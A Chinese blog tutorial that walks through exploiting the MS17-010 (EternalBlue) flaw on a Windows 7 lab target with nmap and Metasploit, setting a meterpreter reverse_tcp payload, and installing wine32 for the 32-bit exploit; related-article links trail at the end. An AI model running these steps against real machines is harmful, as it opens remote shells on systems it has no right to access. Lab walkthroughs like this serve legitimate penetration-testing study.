MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(一)

简介: MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

漏洞复现:MS17-010


漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)


                            2.关闭防火墙


靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9


攻击机:kali linux (X64) ip:192.168.1.101


使用工具:meatsploit,nmap


前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine32环境,并且下载32位操作系统的永恒之蓝漏洞利用脚本。可参考文章后面大佬的博客,也可阅读本文。如果是X64位操作系统则不用安装。


第一部分:主机发现(nmap)


打开nmap进行主机发现,可以扫描到主机的IP地址,端口号,服务器的版本等其他信息


Nmap -A 192.168.1.0/24

ed682db224184e70997a775c81679aef.png


发现靶机开放445端口,那么我们就可以利用该端口进行渗透


第二部分:metasploit工具进行漏洞利用


1.启动该工具

msfconsole


63ffd60c7dc04fe292617e5f23e7db55.png


2. 查找永恒之蓝漏洞利用脚本


search ms17-010


833ca24ee5514c279605c0ae5d2de8e2.png


可以看到有这样几种攻击脚本 (第四个脚本文章会详细说明如何安装),exploit开头的是漏洞利用模块,可以用来进行攻击;auxiliary是漏洞辅助模块,可以查询漏洞的详细信息等。


3.我们先用auxiliary是漏洞辅助模块,查询漏洞的详细信息,如下图所示

use 3   #使用该模块
show options   #显示需要设置的参数
set rhosts 192.168.1.9   #设置靶机的IP地址


18d26f9b41c84eec8ac1816ab4cf9fbe.png


4.查看漏洞利用payload


show payloads


5a67a8134e514ea9916f32994b4b70a6.png


5.设置攻击用到的payloads


set payloads windows/x64/meterpreter/reverse_tcp  #设置payloads
run  #开始进行漏洞利用攻击(输入exploit也可以反弹出交互式shell)


c8aec4f5d3154c9d9fac53ac97656389.png


可以看到提示信息,该主机可能存在这个漏洞


6.接下来我们使用exploit模块(步骤同上,原理同上)------如果未知靶机是多少位的操作系统,我们先用常规的用来测试X64位操作系统

search ms17-010   #查询漏洞利用脚本
use 0   
set payloads windows/x64/meterpreter/reverse_tcp
show options

5bd81459175a455394ef009d2825bc36.png

set rhosts 192.168.1.9   #靶机的IP地址
run 

image.png


本次运行的结果如下,可以看到攻击失败,同时给与提示,该模块只能攻击X64位操作系统,说明我们的靶机是X32位


ef03549c18e84f9f9c8bd7c6196a7e26.png


7.确定靶机是X32位操作系统,安装wine 32环境,安装攻击32位操作系统所用的的脚本


安装wine 32 位环境:

方法一:

apt-get install wine32

36d7e61626854b9f8a66143f9f47ee8c.png


在执行exploit时可能会出现 :


it looks like wine32 is missing, you should install it.


multiarch needs to be enabled first. as root, please


execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"


按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可


apt-get install wine32


dpkg --add-architecture i386 && apt-get update && apt-get install wine32


f3dc57acab214db1aeaf05715edad0db.png


验证是否安装成功


wine --version
  wine cmd.exe


3737f0ef7c5e40ad8a3dd04750a21f1f.png


用wine32执行cmd.exe


wine cmd.exe


486f268ced844f4a8565a4c70166e118.png


如上图所示,即wine 32 安装成功

方法二:(仅供参考)

使用终端输入下列命令


dpkg --add-architecture i386    #这是让Linux安装32位架构,好兼容32位的程序
执行完毕之后再次执行
apt-get update && apt-get install wine32
apt-get install wine32
dpkg --add-architecture i386 && apt-get update &&      
cmdand cmdand> cmd.exe   #输入cmd.exe
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
相关文章
|
1月前
|
数据安全/隐私保护 Windows
安装 Windows Server 2019
安装 Windows Server 2019
|
1月前
|
Windows
安装 Windows Server 2003
安装 Windows Server 2003
|
1月前
|
NoSQL Shell MongoDB
Windows 平台安装 MongoDB
10月更文挑战第10天
46 0
Windows 平台安装 MongoDB
|
1月前
|
Windows Python
Windows安装dlib,遇到问题汇总解决
Windows安装dlib,遇到问题汇总解决
47 4
|
1月前
|
Oracle 关系型数据库 MySQL
Mysql(1)—简介及Windows环境下载安装
MySQL 是一个流行的关系型数据库管理系统(RDBMS),基于 SQL 进行操作。它由瑞典 MySQL AB 公司开发,后被 Sun Microsystems 收购,现为 Oracle 产品。MySQL 是最广泛使用的开源数据库之一,适用于 Web 应用程序、数据仓库和企业应用。
55 2
|
1月前
|
JavaScript Windows
windows安装vue
windows安装vue
|
1月前
|
应用服务中间件 Apache Windows
免安装版的Tomcat注册为windows服务
免安装版的Tomcat注册为windows服务
120 3
|
1月前
|
Linux 网络安全 虚拟化
适用于Linux的Windows子系统(WSL1)的安装与使用记录
并放到启动文件夹,就可以开机自动启动了。
48 0
|
1月前
|
Windows
安装Windows XP系统
安装Windows XP系统
|
1月前
|
Ubuntu Linux 开发工具
windows11安装WLS2+Ubuntu
windows11安装WLS2+Ubuntu